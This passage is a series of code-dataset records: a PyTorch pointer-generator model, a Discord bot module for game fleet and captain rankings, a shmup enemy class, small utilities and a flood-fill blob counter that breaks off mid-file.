(torch.unsqueeze(att_dist, 2) * encoder_states).sum(1)\n decoder_context = torch.cat((torch.squeeze(decoder_output, 1), context_vector), -1)\n p_vocab = F.softmax(self.out_vocab(self.out_hidden(decoder_context)), dim=-1) # replace with embedding weight\n\n p_gen = F.sigmoid(self.gen_layer(torch.cat((decoder_context, torch.squeeze(embedded_input, 1)), 1)))\n '''\n pointer_dist = att_dist * (1-p_gen)\n padding_matrix = Variable(torch.zeros(batch_size, 250)).cuda()\n generator_dist = torch.cat((p_vocab * p_gen, padding_matrix), 1)\n p_final = generator_dist.scatter_add_(1, full_input_var, pointer_dist)\n\n '''\n token_input_dist = Variable(torch.zeros((full_input_var.size()[0], self.vocab_size+500)))\n padding_matrix_2 = Variable(torch.zeros(full_input_var.size()[0], 500))\n if use_cuda:\n token_input_dist = token_input_dist.cuda()\n padding_matrix_2 = padding_matrix_2.cuda()\n\n token_input_dist.scatter_add_(1, full_input_var, att_dist)\n p_final = torch.cat((p_vocab * p_gen, padding_matrix_2), 1) + (1-p_gen) * token_input_dist\n\n #print((p_final_2 - p_final).sum(-1))\n return decoder_hidden.squeeze(0), p_final, p_gen, p_vocab, att_dist\n #return decoder_hidden.squeeze(0), None, None, p_vocab, att_dist\n\n def init_hidden(self, use_cuda):\n result = Variable(torch.zeros(1, 1, self.hidden_size))\n if use_cuda: return result.cuda()\n else: return result\n\n\n\nclass PGCModel():\n def __init__(self, config, vocab, model_id, model_path, use_cuda):\n self.use_cuda = use_cuda\n self.config = config\n self.vocab = vocab\n self.model_id = model_id\n self.model_path = model_path\n\n self.embedding_size = config['embedding_size']\n self.hidden_size = config['hidden_size']\n self.input_length = config['input_length']\n self.target_length = config['target_length']\n\n self.encoder = EncoderRNN(self.vocab.vocab_size, hidden_size=self.embedding_size)\n self.emb_w = self.encoder.embedding.weight # use weight sharing?\n self.decoder = AttnDecoderRNN(self.hidden_size, self.embedding_size, self.vocab.vocab_size, 1,\n dropout_p=0.1, embedding_weight=None)\n if use_cuda:\n self.encoder.cuda()\n self.decoder.cuda()\n\n self.encoder_optimizer = None\n self.decoder_optimizer = None\n self.criterion = None\n 
self.logger = None\n print(\"Model compiled\")\n\n\n def train(self, data, val_data, nb_epochs, batch_size, optimizer, lr, tf_ratio, stop_criterion, use_cuda, _print):\n\n if self.logger is None:\n self.encoder_optimizer = optimizer(self.encoder.parameters(), lr= lr, weight_decay=0.0000001)\n self.decoder_optimizer = optimizer(self.decoder.parameters(), lr= lr, weight_decay=0.0000001)\n self.criterion = nn.NLLLoss()\n self.logger = utils.TrainingLogger(nb_epochs, batch_size, len(data))\n print(\"Optimizers compiled\")\n\n for epoch in range(len(self.logger.log), nb_epochs):\n #random.shuffle(data)\n self.logger.init_epoch(epoch)\n for b in range(int(len(data)/batch_size)):\n loss, _time = self.train_batch(samples=data[b*batch_size:(b+1)*batch_size], use_cuda=self.use_cuda)\n self.logger.add_iteration(b+1, loss, _time)\n if b % 200 == 0 and _print:\n print('\\n', [(t[0]['word'], t[0]['p_gen']) for t in self.predict([data[b*batch_size]], 30, False, self.use_cuda)])\n\n for b in range(1345, int(len(val_data)/batch_size)):\n loss, _time = self.train_batch(val_data[b*batch_size:(b+1)*batch_size], self.use_cuda, backprop=False)\n self.logger.add_val_iteration(b+1, loss, _time)\n\n if epoch == 0 or self.logger.log[epoch][\"val_loss\"] < self.logger.log[epoch-1][\"val_loss\"]:\n self.save_model(self.model_path, self.model_id, epoch=epoch, loss=self.logger.log[epoch][\"val_loss\"])\n\n\n def train_batch(self, samples, use_cuda, tf_ratio=0.5, backprop=True):\n start = time.time()\n input_variable, full_input_variable, target_variable, full_target_variable, decoder_input = \\\n utils.get_batch_variables(samples, self.input_length, self.target_length, use_cuda,\n self.vocab.word2index['SOS'])\n\n\n encoder_hidden = self.encoder.init_hidden(len(samples), use_cuda)\n self.encoder_optimizer.zero_grad()\n self.decoder_optimizer.zero_grad()\n loss = 0\n\n encoder_outputs, encoder_hidden = self.encoder(input_variable, encoder_hidden)\n decoder_hidden = torch.cat((encoder_hidden[0], encoder_hidden[1]), -1)\n\n for token_i in range(self.target_length):\n decoder_hidden, p_final, p_gen, p_vocab, attention_dist = \\\n self.decoder(decoder_input, decoder_hidden, encoder_outputs, full_input_variable, use_cuda)\n loss += self.criterion(torch.log(p_final.clamp(min=1e-8)), full_target_variable.narrow(1, token_i, 1).squeeze(-1))\n\n if random.uniform(0, 1) < tf_ratio: decoder_input = target_variable.narrow(1, token_i, 1)\n else:\n _, max_tokens = p_final.max(1)\n for i in range(max_tokens.size()[0]):\n if max_tokens.data[i] >= self.vocab.vocab_size: max_tokens.data[i] = self.vocab.word2index['UNK']\n decoder_input = max_tokens.unsqueeze(1)\n\n if backprop:\n loss.backward()\n self.encoder_optimizer.step()\n self.decoder_optimizer.step()\n\n return loss.data[0] / self.target_length, time.time() - start\n\n\n\n def predict(self, samples, target_length, beam_size, use_cuda): # this only works with one sample at a time\n input_variable, full_input_variable, target_variable, full_target_variable, decoder_input = \\\n utils.get_batch_variables(samples, self.input_length, target_length, use_cuda,\n self.vocab.word2index['SOS'])\n encoder_hidden = self.encoder.init_hidden(len(samples), use_cuda)\n\n encoder_outputs, encoder_hidden = self.encoder(input_variable, encoder_hidden)\n decoder_hidden = torch.cat((encoder_hidden[0], encoder_hidden[1]), -1)\n\n if not beam_size:\n result = []\n for token_i in range(target_length):\n\n decoder_hidden, p_final, p_gen, p_vocab, attention_dist = \\\n self.decoder(decoder_input, 
decoder_hidden, encoder_outputs, full_input_variable, use_cuda)\n\n\n p_vocab_word, vocab_word_idx = p_final.max(1)\n result.append([{'token_idx': vocab_word_idx.data[i],\n 'word': utils.translate_word(vocab_word_idx.data[i], samples[i], self.vocab),\n 'p_gen': round(p_gen.data[i][0], 3)}\n for i in range(len(samples))])\n _, max_tokens = p_final.max(1)\n for i in range(max_tokens.size()[0]):\n if max_tokens.data[i] >= self.vocab.vocab_size: max_tokens.data[i] = self.vocab.word2index['UNK']\n decoder_input = max_tokens.unsqueeze(1)\n return result\n\n else:\n search_complete = False\n top_beams = [Beam(decoder_input, decoder_hidden, [], [])]\n\n while not search_complete:\n new_beams = []\n for beam in top_beams:\n if not beam.complete:\n decoder_hidden, p_final, p_gen, p_vocab, attention_dist = \\\n self.decoder(beam.decoder_input, beam.decoder_hidden, encoder_outputs, full_input_variable, use_cuda)\n for k in range(beam_size):\n p_vocab_word, vocab_word_idx = p_final.max(1)\n _, max_tokens = p_final.max(1)\n if max_tokens.data[0] >= self.vocab.vocab_size: max_tokens.data[0] = self.vocab.word2index['UNK']\n new_beams.append(Beam(max_tokens.unsqueeze(1), decoder_hidden,\n beam.log_probs+[p_vocab_word.data[0]],\n beam.sequence + [vocab_word_idx.data[0]]))\n p_final[0, vocab_word_idx.data[0]] = 0\n\n if len(new_beams[-1].sequence) == target_length or vocab_word_idx.data[0] == self.vocab.word2index['EOS']:\n #print(vocab_word_idx.data[0], self.vocab.word2index['EOS'])\n new_beams[-1].complete = True\n\n all_beams = sorted([(b, b.compute_score()) for b in new_beams], key=lambda tup: tup[1])\n if len(all_beams) > beam_size: all_beams = all_beams[:beam_size]\n top_beams = [beam[0] for beam in all_beams]\n\n if len([True for b in top_beams if b.complete]) == beam_size: search_complete = True\n\n return [[\" \".join([utils.translate_word(t, samples[0], self.vocab) for t in b.sequence]),\n b.compute_score()]\n for b in top_beams]\n\n def save_model(self, path, id, epoch, loss):\n data = {\n 'epoch': epoch + 1,\n 'best_prec1': loss,\n 'vocab': self.vocab,\n 'config': self.config,\n 'logger': self.logger,\n 'encoder': self.encoder.state_dict(), 'decoder': self.decoder.state_dict(),\n 'encoder_optm': self.encoder_optimizer.state_dict(),'decoder_optm': self.decoder_optimizer.state_dict()\n }\n filename= path + \"checkpoint_\" + id + \"_ep@\" +\".pickle\"\n torch.save(data, filename)\n\n def load_model(self, file_path, file_name):\n data = torch.load(file_path + file_name)\n self.encoder.load_state_dict(data['encoder'])\n self.decoder.load_state_dict(data['decoder'])\n self.vocab = data['vocab']\n\n\nimport math\n\nclass Beam():\n def __init__(self, decoder_input, decoder_hidden, log_probs, sequence):\n self.decoder_input = decoder_input\n self.decoder_hidden = decoder_hidden\n self.log_probs = log_probs\n self.sequence = sequence\n self.complete = False\n\n def compute_score(self):\n score = 1\n for p in [-math.log(log_prob) for log_prob in self.log_probs]:\n score *= p\n return score\n\n\n","sub_path":"PGC/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":13363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"88801518","text":"# Copyright: see copyright.txt\n\nimport sys\nimport traceback\nimport logging\nlog = logging.getLogger(\"se.utils\")\n\ndef _traceback():\n\tstack = traceback.format_stack()\n\treturn stack[:-2]\n\ndef crash(msg):\n\tstack = 
_traceback()\n\tprint(\"\\n\"+\"\".join(stack))\n\tprint(msg)\n\tsys.exit(-1)\n\ndef serialize_dict(d):\n\tnd = {}\n\tkeys = d.keys()\n\tkeys.sort()\n\tfor k in keys:\n\t\tif isinstance(d[k], dict):\n\t\t\tnd[k] = serialize_dict(d[k])\n\t\telif hasattr(d[k], \"__getstate__\"):\n\t\t\tnd[k] = d[k].__getstate__()\n\t\telse:\n\t\t\tnd[k] = d[k]\n\treturn nd\n\ndef flatten_dict(d):\n\tkeys = d.keys()\n\tkeys.sort()\n\tflat_attrs = map(lambda x: (x, d[x]), keys)\n\treturn [item for subtuple in flat_attrs for item in subtuple] # Flatten the list of tuples\n\ndef serialize_list_of_dicts(l):\n\tnl = []\n\tfor d in l:\n\t\tnd = serialize_dict(d)\n\t\tnl.append(nd)\n\tnl.sort(key=flatten_dict)\n\treturn nl\n\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"378576160","text":"import os\nimport inspect\nimport sys\n\ncurrentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nparentdir = os.path.dirname(currentdir)\nsys.path.insert(0, parentdir)\n\n\nclass Position:\n def __init__(self, **kargs):\n self.deal_id = kargs[\"deal_id\"]\n self.size = kargs[\"size\"]\n self.create_date = kargs[\"create_date\"]\n self.direction = kargs[\"direction\"]\n self.level = kargs[\"level\"]\n self.limit = kargs[\"limit\"]\n self.stop = kargs[\"stop\"]\n self.currency = kargs[\"currency\"]\n self.epic = kargs[\"epic\"]\n self.market_id = kargs[\"market_id\"]\n","sub_path":"src/Interfaces/Position.py","file_name":"Position.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"217106870","text":"import calendar\nfrom datetime import datetime\nfrom typing import List, Tuple, Union\n\nfrom discord import Colour, Embed\nfrom discord.ext.commands import Context\nfrom discord.utils import escape_markdown\n\nimport emojis\nimport pss_assert\nimport pss_core as core\nimport pss_entity as entity\nfrom pss_exception import Error\nimport pss_fleet as fleet\nimport pss_login as login\nimport pss_lookups as lookups\nimport pss_sprites as sprites\nimport pss_tournament as tourney\nimport pss_user as user\nimport settings\nfrom typehints import EntitiesData, EntityInfo\nimport utils\n\n\n# ---------- Constants ----------\n\nALLOWED_DIVISION_LETTERS: List[str] = sorted([letter for letter in lookups.DIVISION_CHAR_TO_DESIGN_ID.keys() if letter != '-'])\n\nDIVISION_DESIGN_BASE_PATH: str = 'DivisionService/ListAllDivisionDesigns2'\nDIVISION_DESIGN_DESCRIPTION_PROPERTY_NAME: str = 'DivisionName'\nDIVISION_DESIGN_KEY_NAME: str = 'DivisionDesignId'\n\nSTARS_BASE_PATH: str = 'AllianceService/ListAlliancesWithDivision'\n\nTOP_FLEETS_BASE_PATH: str = 'AllianceService/ListAlliancesByRanking?skip=0&take='\n\n\n\n\n\n# ---------- Top fleets info ----------\n\nasync def get_top_fleets(ctx: Context, take: int = 100, as_embed: bool = settings.USE_EMBEDS) -> Union[List[Embed], List[str]]:\n tourney_running = tourney.is_tourney_running()\n divisions_designs_data = await divisions_designs_retriever.get_data_dict3()\n fleets_divisions_max_ranks = [int(fleet_division_design_info['MaxRank']) for fleet_division_design_info in __get_fleet_division_designs(divisions_designs_data).values()]\n raw_data = await core.get_data_from_path(TOP_FLEETS_BASE_PATH + str(take))\n data = utils.convert.xmltree_to_dict3(raw_data)\n if data:\n title = f'Top {take} fleets'\n prepared_data = 
__prepare_top_fleets(data)\n body_lines = __create_body_lines_top_fleets(prepared_data, tourney_running, fleets_divisions_max_ranks)\n\n if as_embed:\n colour = utils.discord.get_bot_member_colour(ctx.bot, ctx.guild)\n return __create_top_embeds(title, body_lines, colour)\n else:\n result = [f'**{title}**']\n result.extend(body_lines)\n return result\n else:\n raise Error(f'An unknown error occured while retrieving the top fleets. Please contact the bot\\'s author!')\n\n\ndef __create_body_lines_top_fleets(prepared_data: List[Tuple[int, str, str, str]], tourney_running: bool, fleets_divisions_max_ranks: List[int]) -> List[str]:\n if tourney_running:\n result = [\n f'**{position}.** {fleet_name} ({trophies} {emojis.trophy} - {stars} {emojis.star})'\n for position, fleet_name, trophies, stars\n in prepared_data\n ]\n else:\n result = [\n f'**{position}.** {fleet_name} ({trophies} {emojis.trophy})'\n for position, fleet_name, trophies, _\n in prepared_data\n ]\n for rank in sorted(fleets_divisions_max_ranks, reverse=True):\n if rank < len(result):\n result.insert(rank, utils.discord.ZERO_WIDTH_SPACE)\n return result\n\n\ndef __prepare_top_fleets(fleets_data: EntitiesData) -> List[Tuple]:\n result = [\n (\n position,\n escape_markdown(fleet_info[fleet.FLEET_DESCRIPTION_PROPERTY_NAME]),\n fleet_info['Trophy'],\n fleet_info['Score']\n ) for position, fleet_info in enumerate(fleets_data.values(), start=1)\n ]\n return result\n\n\n\n\n\n# ---------- Top captains info ----------\n\nasync def get_top_captains(ctx: Context, take: int = 100, as_embed: bool = settings.USE_EMBEDS) -> Union[List[Embed], List[str]]:\n skip = 0\n data = await __get_top_captains_data(skip, take)\n\n if data:\n title = f'Top {take} captains'\n prepared_data = __prepare_top_captains(data, skip, take)\n body_lines = __create_body_lines_top_captains(prepared_data)\n if as_embed:\n colour = utils.discord.get_bot_member_colour(ctx.bot, ctx.guild)\n result = __create_top_embeds(title, body_lines, colour)\n else:\n result = [f'**{title}**']\n result.extend(body_lines)\n return result\n else:\n raise Error(f'An unknown error occured while retrieving the top captains. 
Please contact the bot\\'s author!')\n\n\ndef __create_body_lines_top_captains(prepared_data: List[Tuple[int, str, str, str]]) -> List[str]:\n result = [\n f'**{position}.** {user_name} ({fleet_name}) - {trophies} {emojis.trophy}'\n for position, user_name, fleet_name, trophies\n in prepared_data\n ]\n return result\n\n\nasync def __get_top_captains_data(skip: int, take: int) -> EntitiesData:\n path = await __get_top_captains_path(skip, take)\n raw_data = await core.get_data_from_path(path)\n data = utils.convert.xmltree_to_dict3(raw_data)\n return data\n\n\nasync def __get_top_captains_path(skip: int, take: int) -> str:\n skip += 1\n access_token = await login.DEVICES.get_access_token()\n result = f'LadderService/ListUsersByRanking?accessToken={access_token}&from={skip}&to={take}'\n return result\n\n\ndef __prepare_top_captains(users_data: EntitiesData, skip: int, take: int) -> List[Tuple]:\n start = skip + 1\n end = skip + take\n result = [\n (\n position,\n escape_markdown(user_info[user.USER_DESCRIPTION_PROPERTY_NAME]),\n escape_markdown(user_info[fleet.FLEET_DESCRIPTION_PROPERTY_NAME]),\n user_info['Trophy']\n )\n for position, user_info\n in enumerate(users_data.values(), start=start)\n if position >= start and position <= end\n ]\n return result\n\n\n\n\n\n# ---------- Stars info ----------\n\nasync def get_division_stars(ctx: Context, division: str = None, fleet_data: dict = None, retrieved_date: datetime = None, as_embed: bool = settings.USE_EMBEDS) -> Union[List[Embed], List[str]]:\n if division:\n pss_assert.valid_parameter_value(division, 'division', min_length=1, allowed_values=ALLOWED_DIVISION_LETTERS)\n if division == '-':\n division = None\n else:\n division = None\n\n if fleet_data is None or retrieved_date is None:\n data = await core.get_data_from_path(STARS_BASE_PATH)\n fleet_infos = utils.convert.xmltree_to_dict3(data)\n else:\n fleet_infos = fleet_data\n\n divisions_designs_infos = await divisions_designs_retriever.get_data_dict3()\n\n divisions = {}\n if division:\n division_design_id = lookups.DIVISION_CHAR_TO_DESIGN_ID[division.upper()]\n divisions[division_design_id] = [fleet_info for fleet_info in fleet_infos.values() if fleet_info[DIVISION_DESIGN_KEY_NAME] == division_design_id]\n else:\n for division_design_id in lookups.DIVISION_DESIGN_ID_TO_CHAR.keys():\n if division_design_id != '0':\n divisions[division_design_id] = [fleet_info for fleet_info in fleet_infos.values() if fleet_info[DIVISION_DESIGN_KEY_NAME] == division_design_id]\n\n if divisions:\n divisions_texts = []\n for division_design_id, fleet_infos in divisions.items():\n divisions_texts.append((division_design_id, __get_division_stars_as_text(fleet_infos)))\n\n result = []\n footer = utils.datetime.get_historic_data_note(retrieved_date)\n colour = utils.discord.get_bot_member_colour(ctx.bot, ctx.guild)\n for division_design_id, division_text in divisions_texts:\n if as_embed:\n division_title = __get_division_title(division_design_id, divisions_designs_infos, False, retrieved_date)\n thumbnail_url = await sprites.get_download_sprite_link(divisions_designs_infos[division_design_id]['BackgroundSpriteId'])\n embed_bodies = utils.discord.create_posts_from_lines(division_text, utils.discord.MAXIMUM_CHARACTERS_EMBED_DESCRIPTION)\n for i, embed_body in enumerate(embed_bodies):\n thumbnail_url = thumbnail_url if i == 0 else None\n embed = utils.discord.create_embed(division_title, description=embed_body, footer=footer, thumbnail_url=thumbnail_url, colour=colour)\n result.append(embed)\n else:\n 
division_title = __get_division_title(division_design_id, divisions_designs_infos, True, retrieved_date)\n result.append(division_title)\n result.extend(division_text)\n result.append(utils.discord.ZERO_WIDTH_SPACE)\n\n if not as_embed:\n result = result[:-1]\n if footer:\n result.append(f'```{footer}```')\n\n return result\n else:\n raise Error(f'An unknown error occured while retrieving division info. Please contact the bot\\'s author!')\n\n\ndef __get_division_stars_as_text(fleet_infos: List[EntityInfo]) -> List[str]:\n lines = []\n fleet_infos = entity.sort_entities_by(fleet_infos, [('Score', int, True)])\n fleet_infos_count = len(fleet_infos)\n for i, fleet_info in enumerate(fleet_infos, start=1):\n fleet_name = escape_markdown(fleet_info['AllianceName'])\n additional_info: List[Tuple[str, str]] = []\n trophies = fleet_info.get('Trophy')\n if trophies:\n additional_info.append((trophies, emojis.trophy))\n member_count = fleet_info.get('NumberOfMembers')\n if member_count:\n additional_info.append((str(member_count), emojis.members))\n stars = fleet_info['Score']\n if i < fleet_infos_count:\n difference = int(stars) - int(fleet_infos[i]['Score'])\n else:\n difference = 0\n if additional_info:\n additional_str = f' ({\" \".join([\" \".join(info) for info in additional_info])})'\n else:\n additional_str = ''\n lines.append(f'**{i:d}.** {stars} (+{difference}) {emojis.star} {fleet_name}{additional_str}')\n return lines\n\n\ndef __get_division_title(division_design_id: str, divisions_designs_infos: EntitiesData, include_markdown: bool, retrieved_date: datetime) -> str:\n title = divisions_designs_infos[division_design_id][DIVISION_DESIGN_DESCRIPTION_PROPERTY_NAME]\n if retrieved_date:\n title = f'{title} - {calendar.month_abbr[retrieved_date.month]} {retrieved_date.year}'\n if include_markdown:\n return f'__**{title}**__'\n else:\n return title\n\n\n\n\n\n# ---------- Helper functions ----------\n\ndef is_valid_division_letter(div_letter: str) -> bool:\n if div_letter is None:\n result = True\n else:\n result = div_letter.lower() in [letter.lower() for letter in ALLOWED_DIVISION_LETTERS]\n return result\n\n\ndef __create_top_embeds(title: str, body_lines: List[str], colour: Colour) -> List[Embed]:\n bodies = utils.discord.create_posts_from_lines(body_lines, utils.discord.MAXIMUM_CHARACTERS_EMBED_DESCRIPTION)\n result = []\n for body in bodies:\n result.append(utils.discord.create_embed(title, description=body, colour=colour))\n return result\n\n\ndef __get_fleet_division_designs(divisions_designs_data: EntitiesData) -> EntitiesData:\n result = {key: value for key, value in divisions_designs_data.items() if value.get('DivisionType') == 'Fleet'}\n return result\n\n\n\n\n\n# ---------- Initilization ----------\n\ndivisions_designs_retriever: entity.EntityRetriever = entity.EntityRetriever(\n DIVISION_DESIGN_BASE_PATH,\n DIVISION_DESIGN_KEY_NAME,\n DIVISION_DESIGN_DESCRIPTION_PROPERTY_NAME,\n cache_name='DivisionDesigns'\n)","sub_path":"src/pss_top.py","file_name":"pss_top.py","file_ext":"py","file_size_in_byte":11409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"119113935","text":"'''\nCreated on 2011/11/10\n\n@author: t\n'''\n\nimport Std\nimport STG.Ctrl as Ctrl\nimport STG.Auxs as Auxs\nfrom STG.Enemy.BaseEnemy import Base\nimport Util.Misc as Misc\nfrom Util.Coroutine import Coroutine\nfrom Util.Coroutine import createWait\nimport Util.NWay as NWay\n\nfrom STG.Regulation.Hidamari.Regular.Stage1.Idiot import Mikan as 
Regulation\n\nclass Mikan(Base):\n\tSIZE = Std.Vector2DF(128, 100)/3 * 2\n\tMAX_HP = Regulation.hp\n\t\n\tdef __init__(self, resource, scoreManager, pos, speed):\n\t\tsuper().__init__(\n\t\t\tStd.Hit.RectI(pos, self.SIZE, True), self.MAX_HP)\n\t\tself.scoreManager = scoreManager\n\t\tself.task = Coroutine(self._task)\n\t\t\n\t\tself.locator = Std.Locator.LinearF(pos)\n\t\tself.locator.speed.setUnitVector(90)\n\t\tself.locator.speed *= speed\n\t\t\n\t\tself.drawParam = Std.Sprite.DrawParam()\n\t\tself.drawParam.texture = resource.st1_Mikan\n\t\tself.drawParam.src = Std.RectF(0, 0, 128, 100)\n\t\tself.drawParam.dst = pos.makeRect(self.SIZE, True)\n\t\tself.drawParam.priority = Ctrl.DrawPriority.enemy\n\t\t\n\t\tself.se_Explode = resource.se_Explode1\n\t\n\t@property\n\tdef position(self):\n\t\treturn self.locator.position\n\tdef applyExternalForce(self, vec):\n\t\treturn self.locator.applyExternalForce(vec)\n\t\n\t@property\n\tdef speed(self):\n\t\treturn self.locator.speed.getAbs()\n\t@speed.setter\n\tdef speed(self, value):\n\t\tself.locator.speed.normalize()\n\t\tself.locator.speed *= value\n\t\n\tdef onUpdate(self):\n\t\tself.locator.update()\n\t\tif self.task.alive:\n\t\t\tself.task.resume()\n\t\t\n\t\tself.drawParam.dst = self.position.makeRect(self.SIZE, True)\n\tdef _task(self):\n\t\tdef getLaunchPos():\n\t\t\tpos = self.position\n\t\t\treturn Std.Vector2DF(pos.x, pos.y + self.SIZE.y / 3)\n\t\tvalidAreaRect = Std.Hit.RectI(\n\t\t\t0, \n\t\t\t0, \n\t\t\tStd.Consts.ScreenSize.x - Std.Consts.StgInfAreaSize.x, \n\t\t\tStd.Consts.ScreenSize.y, \n\t\t\tFalse)\n\t\t\n\t\twhile True:\n\t\t\twait = createWait(Regulation.waitFrameNum)\n\t\t\twhile wait(): yield\n\t\t\t\n\t\t\tdrawParam = Auxs.createBulletRedDrawParam(\n\t\t\t\tgetLaunchPos(), Std.Vector2DF(10, 10))\n\t\t\tangle = self.position.getAngle(Ctrl.Actor.myShip.position)\n\t\t\tinterval = Regulation.interval\n\t\t\tnum = Regulation.wayNum\n\t\t\tradius = int(drawParam.dst.w/2)\n\t\t\tfor _ in range(Regulation.launchNum):\n\t\t\t\tpos = getLaunchPos()\n\t\t\t\tNWay.launchLinear(pos, angle, interval, num, radius, drawParam)\n\t\t\t\tlaunchInterval = createWait(Regulation.launchInterval)\n\t\t\t\twhile launchInterval(): yield\n\t\t\t\n\t\t\tif not validAreaRect.isHit(self.hitRect):\n\t\t\t\tbreak\n\tdef onDraw(self):\n\t\tStd.Sprite.draw(self.drawParam)\n\t\n\tdef onErase(self):\n\t\tMisc.createExplosion(\n\t\t\tCtrl.DrawPriority.enemy, \n\t\t\t5, \n\t\t\tself.locator.position, \n\t\t\t200, \n\t\t\t1, \n\t\t\tStd.Vector2DF(48, 48)\n\t\t\t)\n\t\tself.se_Explode.play()\n\tdef onDestructed(self):\n\t\tself.onErase()\n\t\tself.scoreManager.addScore(self.maxHp)\n\t\t\n\t\titemNum = Regulation.itemNum\n\t\tangleList = NWay.getAngleList(\n\t\t\tRegulation.itemLaunchAngle, Regulation.itemLaunchAngleInterval, itemNum)\n\t\tdef effectCallback(result):\n\t\t\tif not result:\n\t\t\t\tself.scoreManager.addScore(1000)\n\t\tfor angle in angleList:\n\t\t\titem = Auxs.Item.PowerUp(self.position, angle)\n\t\t\titem.setEffectCallback(effectCallback)\n\t\t\tCtrl.Actor.registerItem(item)\n\tdef onDamaged(self, damage):\n\t\tself.scoreManager.addRate(damage * 0.01)\n\tdef onDestructedByDamage(self, damage):\n\t\tself.onDestructed()","sub_path":"Script/Python/src/STG/Stage/Hidamari/Regular/Stage1/Enemy/Mikan.py","file_name":"Mikan.py","file_ext":"py","file_size_in_byte":3222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"379782100","text":"import sys\n\n\ndef adder(integers):\n for i in integers:\n if 
not i.isdigit():\r\n        raise ValueError(f'input {repr(i)} is not an integer!')\r\n    return sum(map(int, integers))\r\n\r\n\r\ndef main():\r\n    print(adder(sys.argv[1:]))\r\n\r\n\r\nif __name__ == '__main__':\r\n    main()\r\n","sub_path":"int_addr/int_adder.py","file_name":"int_adder.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"292465719","text":"class Solution:\n    def subdomainVisits(self, cpdomains: List[str]) -> List[str]:\n        # Count domains\n        from collections import defaultdict\n        counter = defaultdict(int)\n        for string in cpdomains:\n            count, domains = string.split(' ')\n            domains = domains.split('.')\n            count = int(count)\n            for i in range(len(domains)):\n                domain = '.'.join(domains[-i:])\n                counter[domain] += count\n\n        # Output results\n        output = []\n        for domain, val in counter.items():\n            output.append(f'{val} {domain}')\n        return output\n","sub_path":"leetcode/lc811_Subdomain_Visit_Count.py","file_name":"lc811_Subdomain_Visit_Count.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"585799449","text":"import numpy as np\n\n# -------- Test picture --------------\nimport cv2\nimport imageio as imio\nimport pylab\nimport matplotlib\nfrom matplotlib import pyplot as plt\n\nimgA = imio.imread(\"./testbilder/blob5.png\")\nimgA = imgA[:,:,0]\nfull_image = (imgA>200)*1\nfull_image_dim = full_image.shape\n\n#print(\"image dim:\",full_image_dim)\n#print(\"Full: \",full_image)\n\n\ndef floodFill(x,y,cluster_id):\n\n    #print(\"floodfill\", x,y,full_image[x,y])\n    if full_image[x,y]==1:\n        toFill = set()\n        toFill.add((x,y))\n        while len(toFill)!=0:\n            (xi,yi) = toFill.pop()\n            full_image[xi,yi] = cluster_id # Fill\n\n            for xii in [-1,0,1]:\n                for yii in [-1,0,1]:\n                    if not (xii==0 and yii==0):\n                        cx = xi + xii\n                        cy = yi + yii\n\n                        in_bound = cx>=0 and cx<=full_image_dim[0]-1 and\\\n                                   cy>=0 and cy<=full_image_dim[1]-1\n\n                        if in_bound:\n                            if full_image[cx,cy]==1:\n                                toFill.add((cx,cy))\n        return(1)\n    else:\n        return(0)\n\n\"\"\"\nxi=1\nyi=1\nwhile xi < sub_matrices_dim[0]:\n    while yi < sub_matrices_dim[1]:\n        cluster_id+=floodFill(xi,yi,cluster_id)\n        if xi+3 < sub_matrices_dim[0]:\n            xi = xi+3\n        else:\n            xi = sub_matrices_dim[0]-2\n        if yi+3 < sub_matrices_dim[1]:\n            yi = yi+3\n        else:\n            yi = sub_matrices_dim[1]-2\n\"\"\"\n\ncluster_id=2\nfor xi in range(1,full_image_dim[0],2):\n    for yi in range(1,full_image_dim[1],2):\n        cluster_id+=floodFill(xi,yi,cluster_id)\n\nprint(\"cluster: \",cluster_id, cluster_id-2)\n\n\ncluster_areas=[]\ncluster_x=[]\ncluster_y=[]\n\ncluster_coordinates = [[],[]]\n\nnbr_clusters = cluster_id-2\n\n# ---- Cluster areas and mass center ----\ncoordinates = np.mgrid[0:full_image_dim[0],0:full_image_dim[1]]\n    #(rows/cols,x,y)\n\nif nbr_clusters>0:\n    for cluster in range(0,nbr_clusters):\n        current_cluster = full_image==2+cluster\n\n        c_a=np.sum(current_cluster)\n        cluster_areas.append(c_a)\n\n        #print(c_a)\n        #print(\"hmmm:\\n\",np.multiply(coordinates[0,:,:],current_cluster))\n        #print(\"hmmm:\\n\",np.multiply(coordinates[1,:,:],current_cluster))\n\n        c_x = round(np.sum(np.multiply(coordinates[0,:,:],current_cluster))/c_a)\n        c_y = round(np.sum(np.multiply(coordinates[1,:,:],current_cluster))/c_a)\n        cluster_x.append(int(c_x))\n        cluster_y.append(int(c_y))\n\n        cluster_coordinates[0].append(int(c_x))\n        
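# centroid = first image moment / blob area; the same values are also kept pairwise, convenient for plotting all blobs at once\n        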
